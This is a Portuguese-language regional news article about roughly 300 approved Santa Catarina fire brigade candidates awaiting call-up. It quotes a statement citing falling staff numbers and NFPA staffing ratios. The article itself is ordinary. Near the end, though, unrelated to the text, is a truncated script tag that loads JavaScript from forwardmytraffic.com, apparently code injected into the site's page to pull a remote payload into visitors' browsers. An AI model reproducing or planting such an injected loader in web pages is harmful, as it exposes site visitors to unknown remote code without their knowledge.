InícioDestaque300 Aprovados no concurso para o Corpo de Bombeiros aguardam convocação.

300 Aprovados no concurso para o Corpo de Bombeiros aguardam convocação.

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...
Facebook.com/excedentescbmsc
Instagram.com/excedentescbmsc
“Uma das grandes preocupações atuais gira em torno da segurança, ou melhor, da falta dela. Vivemos num Brasil cada dia mais vulnerável e desamparado quando o assunto é dar ao seus cidadãos o simples direito à proteção e à assistência. Infelizmente, em Santa Catarina, a realidade de uma das instituições historicamente mais ativas, eficientes e reconhecidas têm corroborado com essa triste perspectiva. O Corpo de Bombeiros militar neste estado sofre, nos últimos anos, uma perda substancial de seu efetivo, sem que se veja, por outro lado, o real compromisso em repor essa força de trabalho tão fundamental. O cenário é ainda mais grave, quando olhamos para o quadro de praças da corporação, ou seja, para o déficit dos profissionais responsáveis justamente pelo operacional, encarregados pelo atendimento efetivo da população.

Conforme dados do Portal da Transparência, tomando por base o mês de fevereiro, em 2015 eram 2.768 Bombeiros; em 2016 o número caiu para 2.637; reduzindo para 2.488 em 2017 e chegando ao ano de 2018 a 2.365. Em média, são 137 militares que deixam o serviço ativo por ano. Em contrapartida, segundo última publicação  do IBGE, a população catarinense já ultrapassou os 7 milhões de habitantes. Numa constatação simples, o número de militares diminuiu, enquanto o número de ocorrências  só aumenta.

Para a National Fire Protection Association (NFPA), uma das entidades mais respeitadas no mundo, a recomendação é de que haja de 0,5 a 2,7 Bombeiros para cada 1.000 (hum mil) habitantes. A conta é simples: no ano de 2018 temos a média de 0,33 bombeiros militares para cada mil habitantes. Muito abaixo do mínimo recomendado, seriam necessários pelo menos 3.500 profissionais a mais. Uma insuficiência numérica que, não se engane, já traz consequências devastadoras.

Em algumas cidades do estado, há quartéis já eventualmente fechados por falta de guarnição, bem como expedientes que também têm sido reduzidos, diretrizes de Atendimento Pré-Hospitalar alteradas ou, ainda, sinistros que podem não ser controlados adequadamente, vitimizando a população. Esses são apenas alguns dos exemplos já divulgados na mídia local e que poderiam  ser solucionados com a simples contratação de bombeiros militares operacionais. Solução que pode imediatamente ser tomada, basta haver o interesse governamental para tal.

Do concurso realizado em 2017 para soldado do CBMSC apenas uma turma de aproximadamente 300 alunos foi incluída até o presente momento, o que não será o suficiente para incrementar o efetivo, e sim, apenas, para suprir as baixas já existentes. Para que exista o real reforço profissional, a única medida possível é aproveitados ao máximo todos os candidatos aprovados e aptos em todas as fases já aplicada do certame. São mais de 300 jovens que apenas dependem da convocação para entrega de documentos e ingresso no Curso. São mais de 300 novos bombeiros militares prontos para receberem a  capacitação necessária e atenderem a população catarinense do modo que esta merece ser tratada, com a competência, a eficiência e a responsabilidade marca de um corpo de bombeiros militar que há 92 anos luta para abrilhantar a história desta terra. ”

Vídeo: https://youtu.be/khujmaJ4VT0

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.